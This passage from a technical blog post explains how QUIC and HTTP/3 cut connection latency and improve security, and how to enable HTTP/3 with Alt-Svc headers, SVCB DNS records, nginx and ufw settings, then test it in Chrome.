Let’s look at the overhead in creating a new connection across the three most common stacks. HTTP/2 with TLS 1.2, HTTP2 with TLS 1.3, and HTTP/3 on QUIC.

With TLS 1.2, the first request will require no less than 4 network round trips between client and server before the first HTTP response is delivered. One for TCP’s SYN/ACK handshake, two for TLS key exchange and session start, and finally the HTTP request itself. TLS 1.3 improved on this by combining its two round trips into one, saving 25%. HTTP/3 saves an additional trip by combining the equivalent of the TLS handshake (which no longer exists in QUIC) with the TLS setup, followed by the HTTP request, giving a 50% improvement over HTTP/2 with TLS 1.2.

fig3: Initial connections

 

When a client makes subsequent requests to the same server, we can save some effort – we already know what TLS configuration to use, so no key exchange or cipher negotiation is needed. This allows a resumed connection with HTTP/2 over TLS 1.3 to take only 2 network round trips. HTTP/3 goes further though, as it can combine all three into a single round-trip, halving the latency. When TLS 1.3 was announced back in 2016, this was touted as “0-RTT”, which was definitely an improvement, but it ignored that it still had TCP’s overhead. HTTP/3 delivers it for real.

fig4: Resumed connections

Network switching

I mentioned earlier that TCP connections are identified by the combination of the client’s IP + port number, resulting in needing to re-establish connections when these change. QUIC avoids this by not identifying connections this way and instead assigns a connection identifier (a random number) during the initial connection. All subsequent requests can use that identifier regardless of which network they are using. A major advantage of this is it means that resumed requests are much more likely to happen, as the connection does not need to be reset every time we switch networks, which is great news for busy or slow networks.

That sounds cool, but also like a bit of a privacy problem, as it means that you can be traced as you move between networks. Fortunately, this is something QUIC’s designers thought about. Instead of assigning you a single, static identifier on the initial connection, you’re assigned a pool of random values, and each time you switch networks the next value is used, so the server and client know you are the same user, but the networks in between do not. Clever, huh?

Header compression

When HTTP/2 introduced its binary protocol, it was able to add compression of HTTP headers, which were uncompressed in previous HTTP incarnations. In these days of chunky JWTs and Content-Security-Policy HTTP headers, this can represent a fair saving in the data required to transfer them.

Unfortunately, HTTP/2’s HPACK compression is dependent on reliable delivery of the underlying data, so everything has to be received in the compressed chunk’s entirely before it can be decompressed – it’s really another form of HOLB. HTTP/3 switches to a compression scheme called QPACK which is slightly less efficient, but avoids this congestion problem.

Security upgrade

While TLS 1.3 has been available as an option for a long time – My first conference talk on TLS 1.3 was in 2016 – QUIC makes it a requirement. Because QUIC is completely integrated with TLS, more of the data is encrypted – the only things not encrypted are the connection IDs, which are just random numbers anyway.

TLS 1.3 brings a bunch of security improvements over 1.2:

  • Lower overhead, as we’ve seen
  • No weak cipher suites, key-exchange algorithms, MACs, or hash functions
  • Perfect forward secrecy in all cipher suites
  • Downgrade detection

HTTP/3 is even safer than HTTP/2 + TLS 1.3 because more of the connection is encrypted – encryption kicks in earlier in the process when using QUIC, and encrypts its headers, whereas even TLS 1.3 does not.

All that said, HTTP/3 shares the same problem with resumed connections that HTTP/2 does in that it is not especially well defended against replay attacks. For this reason resumed connections should only be used for idempotent requests that do not change server state, which typically means GET requests only.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

HTTP/3 implementations

HTTP/3 is harder to implement than HTTP/2 because every application has to implement all of the underlying QUIC protocol as well at both ends of the connection. Fortunately this speed bump is now largely in the past as HTTP/3 has been implemented in the majority of places that it’s needed.

Unsurprisingly, the first HTTP/3 client was Chrome, then in Chromium based-browsers that inherited from it, such as Microsoft Edge, soon followed by Firefox and Safari, including in iOS 15.

Servers were quick to follow, with Litespeed taking the chequered flag, followed by Caddy, Nginx, IIS (in Windows Server 2022), and HAProxy. The one straggler yet to make the finish line is Apache, but I’m sure it will get there soon. Libraries are vitally important for many implementations, saving a lot of development effort, and h2o, nghttp3, libcurl, and OpenSSL now all have HTTP/3 support.

Several cloud services, most notably CloudFlare, have updated their front-ends to support HTTP/3, so if you’re using that, it’s likely you have HTTP/3 support without even noticing!

Remember that all of these are “userland” implementations, and so are not subject to OS stagnation; so long as the OS supports UDP (and they all do), we’re good to go.

Deploying HTTP/3

We do have a slight chicken & egg problem: How does a client know that it can use HTTP/3? If the client just tries to use it, the server might not support it, and so we will be stuck there waiting for it to time out before we can fall back to HTTP/2 or further. This isn’t really acceptable, so we need to approach it from the other direction, providing hints to the client that they can upgrade their connection to HTTP/3 after they have connected by HTTP/2. This works much as we handle unencrypted HTTP – clients connect to the unsecured endpoint, and are then redirected to the secure one.

There are two key mechanisms available to do this. The Alt-Svc HTTP header, and the SVCB DNS record type.

The Alt-Svc HTTP header is defined in RFC7838, and is short for “Alternative service”, and works in a similar way to Strict-Transport-Security (HSTS) for HTTPS. A typical header might look like this:

Alt-Svc: h3=":443"; ma=3600, h2=":443"; ma=3600

This tells the client that the service that it’s connecting to is available on HTTP/3 on UDP port 443 and HTTP/2 over TCP on port 443, in that order or preference. In both cases the client is also told that these services will be available for at least the next 3600 seconds (1 hour). Once the browser has seen this header, it can then set about switching to the faster protocol.

The SVCB (“Service Binding”) DNS record type is defined in RFC9460, and looks like this:

example.com 3600 IN HTTPS 1 . alpn="h3,h2"

This says to a client that the _example.comdomain offers HTTPS service over HTTP/2 and HTTP/3 for at least the next hour. There is a bit of a silly issue here - we could have found out the same thing from anAlt-Svc` record just by going straight to the service. So we have just swapped an HTTP request for a DNS lookup, both of which are likely to have about the same network overhead. However, we need to do a DNS lookup anyway to discover the IP address to connect to, so this seems like extra work. Fortunately, the SVCB records authors thought of this too, and the response can include IP address hints, like this:

example.com 3600 IN HTTPS 1 . alpn="h3,h2" ipv4hint="192.0.2.1" ipv6hint="2001:db8::1"

This gives us both the information about the service availability and the IP addresses that we need to connect to; two birds, one stone.

SVCB has another trick up its sleeve: you can provide multiple records with different priorities and abilities:

example.com 3600 IN HTTPS 1 example.net alpn="h3,h2"
example.com 3600 IN HTTPS 2 example.org alpn="h2"

This says that the service is available on example.com over HTTP/2 and HTTP/3, but is also available as a fallback (with a higher weighting value meaning a lower priority) over HTTP/2 only at example.net.

Nginx config example

I have to say that Caddy is the easiest to configure for HTTP/3 because it’s enabled by default. That’s possible because of its integrated automatic certificate setup feature and you don’t have to do anything in addition. However nginx is extremely popular, so here’s how to make it work there.

server {
  listen 443 ssl;
  listen [::]:443 ssl;
  listen 443 quic;
  listen [::]:443 quic;
  http2 on;
  add_header Alt-Svc 'h3=":443"; ma=86400';
  server_name example.com www.example.com;

The first two lines will be familiar territory for nginx users – it’s not changed at all, though nginx moved the http2 switch from the listen directive to its own directive in version 1.25.1 in 2023.

We then add two lines to add listeners for QUIC on IPv4 and 6, on the same interfaces and port number as for HTTP/2, but there is no clash because they are on UDP instead of TCP.

You can find the nginx QUIC docs at nginx.org/en/docs/quic.html.

We then add an Alt-Svc header indicating that we recommend moving to HTTP/3 and it will be available for at least the next day. We don’t actually need to specify that we also offer HTTP/2, because it’s implicit – if we didn’t the client wouldn’t get to see this at all.

After this we carry on with all the other nginx config directives we might need – the server name, root directory, certificate locations, additional headers, logging config, etc. Remember that HTTP/3 requires TLSv1.3.

You also need to allow inbound traffic to UDP port 443 in your firewall and possibly in your cloud provider’s security groups too. In ufw on Debian and derivatives, you’d add it like this:

ufw allow proto udp from any to any port 443

In the next major releases of the Debian and Ubuntu packages later in 2024, you’ll also find support for an nginx ufw application (thanks to a PR by yours truly) that allows you to write this in a slightly prettier way, supporting all of HTTP/1, 2, and 3 in one line:

ufw allow from any to any app "Nginx QUIC"

Optimising for HTTP/3

Despite all the underlying changes, HTTP/3 remains unchanged with respect to HTTP semantics, so when it comes to optimisation it’s also the same as for HTTP/2. The short version:

  • Use few domains for loading content (reducing the number of DNS lookups and connection setups)
  • Don’t worry about bundling; request count doesn’t really matter any more, and larger numbers of small requests are easier for the browser to cache and manage. Think of webpack as an antipattern!
  • Make use of defer / preload / async directives for lazy-loading resources, letting the browser schedule them most efficiently.

iJS Newsletter

Keep up with JavaScript’s latest news!

Testing HTTP/3

Testing HTTP/3 is slightly tricky. Until it sees the Alt-Svc header, a client doesn’t know it can use HTTP/3, so the very first request will be HTTP/2 (unless it’s done an SVCB lookup).

That status will persist for the max-age of the Alt-Svc header, so you want to keep that very short while testing. One trick I learned when playing with this is that browsers forget the max-age value if you use incognito/private browsing windows, so use that if you want to be able to see the 2 to 3 handoff repeatedly.

The first request will always be over HTTP/2, but you can’t predict exactly when the browser will switch to HTTP/3 for sub-requests. Browsers optimise very aggressively, so after it’s seen the Alt-Svc header, the browser may issue sub-resource requests simultaneously over both HTTP/2 and HTTP/3 for the same resource as a way of measuring which provides the best performance, and then use that result for subsequent requests.

If you open the network tab in Chrome’s developer tools, right-click on the request table’s header and enable “Protocol”, you’ll see a table column that shows what protocol the browser is using for each request. You should expect to see h2 for the first request, the further h2 requests for sub-resources, but at some point you’ll see it switch to h3. You might expect a reload to result in h3 or everything, however, you may find that Chrome classes anything delivered from its local cache as h2, even though it has never actually hit the network. Disabling the cache should allow you to see that everything has switched to h3 on reload. If you roll your mouse over the value in the protocol column, it will tell you why it selected that protocol, which is very useful for diagnosing connections that don’t seem to make the switch (e.g. if your browser finds that your site’s HTTP/3 responses are slower than HTTP/2, it won’t use them).

fig5: Dev tools view showing protocol column

There is a handy testing service at http3check.net that will confirm that your site is delivered over HTTP/3. There is a Chrome extension called HTTP Indicator that displays a little lightning bolt icon in your toolbar – blue for HTTP/2, orange for HTTP/3.

Crunch time: Is it actually faster?

Unfortunately, the answer here is “it depends“. As you’ve seen, it can be difficult to measure, but the biggest payoff will be in situations there HTTP/3’s features make a difference, which will be when you have any combination of:

  • Low bandwidth
  • High congestion
  • High latency
  • Frequent network switching

So if you’re testing this on your company’s fast fibre connection or good domestic broadband, you won’t see (or measure) any practical difference. But if you’re up a mountain in a country the other side of the world, with a weak signal, switching between roaming services during a major sporting event, it’s much more likely to help.

In 2022, Google reported a 14% speed improvement for the slowest 10% of users. Fastly/Wix reported an 18-33% improvement in time to first byte for HTTP/3.

This is really HTTP/3’s payoff – it raises the performance floor for everyone; those with the worst connections are the ones that will benefit most.

HTTP/3 problems

Not everything is rosy in the HTTP/3 garden; there are new opportunities for things to go astray. Networks might block UDP. There is latency in version discovery. It’s new, so will have more bugs. That more is encrypted is a double-edged sword; the increased protection makes it more difficult to do do low-level network analysis and troubleshooting, and making it much less friendly to corporate monitoring.

The future of QUIC

QUIC used a deliberately dynamic specification. Soon after the original 1.0 release. version 2 was released in RFC9369. This was essentially unchanged, but it forced implementors to cope with version number changes to prevent stagnation and “ossifcation” like MIME 1.0 experienced. This is especially prevalent in “middleboxes” that provide things like WAF and mail filtering.

QUIC features pluggable congestion control algorithms, so we are likely to see QUIC implementations tuned for mobile, satellite, low-power, or very long distance networks that have different usage and traffic profiles to broadband.

Though QUIC and HTTP/3 are very closely tied, it’s possible for other protocols to take advantage of QUIC’s approach, and there have already been implementations of SSH over QUIC and a proposed standard for DNS over QUIC.

What are you waiting for?

Go configure HTTP/3 on your servers now!

Further reading

 

The post QUIC and HTTP/3: The Next Step in Web Performance appeared first on International JavaScript Conference.

]]>